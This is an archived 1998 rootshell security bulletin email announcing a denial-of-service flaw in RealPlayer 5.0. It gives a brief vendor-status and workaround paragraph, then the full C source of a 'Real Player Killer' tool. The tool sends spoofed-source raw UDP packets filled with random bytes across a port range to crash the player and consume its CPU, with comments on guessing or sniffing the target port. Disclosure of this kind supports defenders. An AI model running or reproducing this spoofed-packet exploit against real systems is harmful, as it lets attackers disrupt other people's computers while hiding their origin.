[rootshell] Security Bulletin #20

[aleph1 () DFW NET (Aleph One)]

Date: 6 Jul 1998 15:31:00 -0000
From: announce-outgoing () rootshell com
Cc: recipient list not shown:  ;
Subject: [rootshell] Security Bulletin #20


www.rootshell.com
Security Bulletin #20
July 6th, 1998

[ http://www.rootshell.com/ ]

----------------------------------------------------------------------

To unsubscribe from this mailing list send e-mail to majordomo () rootshell com
with "unsubscribe announce" in the BODY of the message.

Send submissions to info () rootshell com.  Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.

An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive

----------------------------------------------------------------------

01. Real Player 5.0 Killer
--------------------------

Real Networks has been notified of the problem and has stated that they will
make a fix for their upcoming G2 release and are considering making a patch
available for all of the 5.0 players out there.  The only available
workaround at this time is to force your player to use TCP instead of UDP
for streams in the transport area of the preferences menu.

/*
 * Real Player Killer - 6/26/98
 *
 * (C) 1998 Kit Knox <kit () connectnet com>
 *
 * [ http://www.rootshell.com/ ]
 *
 * Real Player 5.0 for Windows95 and Linux (others untested) do not check
 * the validity of incoming UDP packets used when receiving audio/video.
 *
 * If you are able to determine or brute force the destination port of the
 * stream you are able to crash the player and cause it to use 100% of
 * idle CPU.  I would not be surprised if there are numerous buffer
 * overflows in this area as well.  The client does not even check if the
 * source IP address is the one it is receiving data from.  Any source IP
 * can be used.
 *
 * Generally the stack will start with port 1025 and go up.  Starting there
 * and going up will generally give you good results.  If you are able to
 * sniff the network you will know the exact port and not have to guess.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

char real_data[] =
  { 0x00, 0x00 };


unsigned short
in_cksum (addr, len)
     u_short *addr;
     int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
     struct sockaddr_in *sin;
     unsigned short int s, datalen, sport, dport;
     unsigned long int saddr, daddr;
     char *data;
{
  struct iphdr ip;
  struct udphdr udp;
  static char packet[8192];
  char crashme[500];
  int i;

  ip.ihl = 5;
  ip.version = 4;
  ip.tos = rand () % 100;;
  ip.tot_len = htons (28 + datalen);
  ip.id = htons (31337 + (rand () % 100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check = 0;
  ip.saddr = saddr;
  ip.daddr = daddr;
  ip.check = in_cksum ((char *) &ip, sizeof (ip));
  udp.source = htons (sport);
  udp.dest = htons (dport);
  udp.len = htons (8 + datalen);
  udp.check = (short) 0;
  memcpy (packet, (char *) &ip, sizeof (ip));
  memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
  memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
  for (i = 0; i < 500; i++)
    crashme[i] = rand () % 255;
  memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
  return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
                  (struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}

unsigned int
lookup (host)
     char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr (host);
  if (addr == -1)
    {
      he = gethostbyname (host);
      if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
        return 0;

      bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
  return (addr);
}

void
main (argc, argv)
     int argc;
     char **argv;
{
  unsigned int saddr, daddr;
  struct sockaddr_in sin;
  int s, i;

  if (argc != 5)
    errs ("Usage: %s <source_addr> <dest_addr> <low port> <high port>\n", argv[0]);

  printf("Real Player Killer - http://www.rootshell.com/\n\n";);
  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if (!(saddr = lookup (argv[1])))
    err ("Unable to lookup source address.\n");
  if (!(daddr = lookup (argv[2])))
    err ("Unable to lookup destination address.\n");
  sin.sin_family = AF_INET;
  sin.sin_port = 9;
  sin.sin_addr.s_addr = daddr;
  for (i=atoi(argv[3]); i<atoi(argv[4]); i++)
  if ((sendpkt_udp (&sin, s, &real_data, sizeof (real_data), saddr, daddr, 2014, i)) == -1)
    {
      perror ("sendpkt_udp");
      err ("Error sending the UDP packet.\n");
    }
  printf("Done!\n");
}

----------------------------------------------------------------------

To unsubscribe from this mailing list send e-mail to majordomo () rootshell com
with "unsubscribe announce" in the BODY of the message.

Send submissions to info () rootshell com.  Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.

An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive

----------------------------------------------------------------------